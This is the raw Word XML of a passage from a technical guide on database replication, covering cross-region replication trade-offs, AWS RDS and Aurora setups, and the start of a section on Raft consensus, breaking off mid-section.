    <w:p w14:paraId="449E9F43" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="326F619A">
          <v:rect id="_x0000_i5646" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450B81E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. Cross-Region Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B40427" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Why Replicate Across Regions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777"/>
        <w:gridCol w:w="5753"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="50314E8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104148" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Goal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A53D67" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="279C962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9DFD57" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Disaster recovery (DR)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0CAED9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>If entire region fails, other region has the data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="4C1CC70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39D992" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Read latency reduction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5C89BB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Users read from local region (5ms instead of 200ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="2DE4502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0BB681" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Data sovereignty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65225E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Certain data must reside in specific jurisdictions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="7B69062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E2F5FB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Write availability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03588D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Multi-leader: writes continue during regional failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="071E7D83" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Challenges of Cross-Region Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C1AEA2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C553E7E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B1FC0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Same datacenter: 0.5ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160DB02A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Cross-AZ (same region): 1–2ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262C0391" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Cross-region (same continent): 20–50ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01919005" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Cross-region (intercontinental): 100–200ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484EC816" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="115EDDA5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Synchronous replication across regions: adds 100–200ms to EVERY write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69C639" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Most systems use async for cross-region → replication lag = 100–200ms minimum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E67D42" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00600CE5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB5E57" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write volume: 10,000 writes/sec × 500 bytes = 5 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF35CE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Cross-region: 5 MB/s × $0.02/GB = $0.0001/sec = $8.64/day = $260/month (per region)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FEDFC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conflict resolution (multi-region writes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9C7B3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1534"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Same key written in US and EU simultaneously → conflict.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECEC7C4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1534"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Needs resolution strategy (LWW, merge, CRDTs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD26459" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9.3 Active-Passive vs. Active-Active Cross-Region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60825F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Passive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407660C3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186AE233" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Region A (active): Accepts all reads + writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57746B55" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Region B (passive): Read-only replica, hot standby for DR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28468D8C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="35B0FC64" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Failover: promote Region B to active (manual or automated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF5B92" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RPO: replication lag (100–200ms of data potentially lost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8E8AC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RTO: minutes (promotion + DNS change + client migration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02F941" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F212CAD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB9835" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Region A: Accepts reads + writes for its users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAD4EF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Region B: Accepts reads + writes for its users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157D10E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Both replicate to each other (multi-leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FBE613" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="2AB60E2B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Benefit: writes are always local (low latency), survives region failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A41FE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Challenge: conflicts when same data is written in both regions simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD273DB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conflict mitigation in active-active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B37672" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1535"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partition writes by region:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> User A's data always writes in Region A. User B's data always writes in Region B. No conflicts (writes for the same entity always go to same region).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3BDBF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1535"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRDTs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Use data structures that merge without conflict (counters, sets, registers with timestamps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1923030F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1535"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level conflict resolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> On conflict detection, invoke application logic to merge (e.g., merge shopping carts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F39128A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.4 AWS RDS Multi-Region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B892BE5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDS Multi-AZ (same region — synchronous):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5865E275" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD7C7E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary (us-east-1a) ←sync→ Standby (us-east-1b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358DCD62" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Automatic failover: 30–60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0CF9C0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Zero data loss (synchronous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D609BA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDS Read Replicas (cross-region — asynchronous):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063FE949" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE53849" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary (us-east-1) ──async──→ Read Replica (eu-west-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AD2D26" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Read Replica (eu-west-1) ──async──→ Read Replica (ap-northeast-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9E278" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="0662035E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Purpose: read scaling + DR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7927E4AB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replication lag: typically 100ms–seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C64D1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Can be promoted to standalone (for DR), but loses replication link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61346098" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aurora Global Database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A89AD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F307F3F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary cluster (us-east-1): reads + writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E8613" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Secondary cluster (eu-west-1): read-only, &lt; 1 second replication lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA8037" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Failover: promote secondary cluster (RTO &lt; 1 minute, RPO &lt; 1 second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD57460" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Mechanism: Storage-level replication (not SQL-level) — very efficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DE8221" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="760022B0">
          <v:rect id="_x0000_i5647" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53332479" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Replication and Consensus — Raft and Paxos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0B12CA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Why Consensus Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDCD19B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> In a replicated system with automatic failover, how do nodes agree on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55621BD2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1536"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Who is the current leader?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD23283" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1536"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>What is the committed state of the log?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE8A2A8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1536"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Is a node truly dead or just partitioned?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B4E36B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Without consensus: split-brain (multiple leaders), data divergence, corruption. With consensus: single agreed-upon leader, consistent replicated log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46855849" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Raft — The Understandable Consensus Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498CF40" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> etcd, CockroachDB, TiDB, Consul, RabbitMQ (Quorum Queues), MongoDB (modified).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75537ED9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Raft works (simplified):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36384E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leader election:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1ACA58" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D19325" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
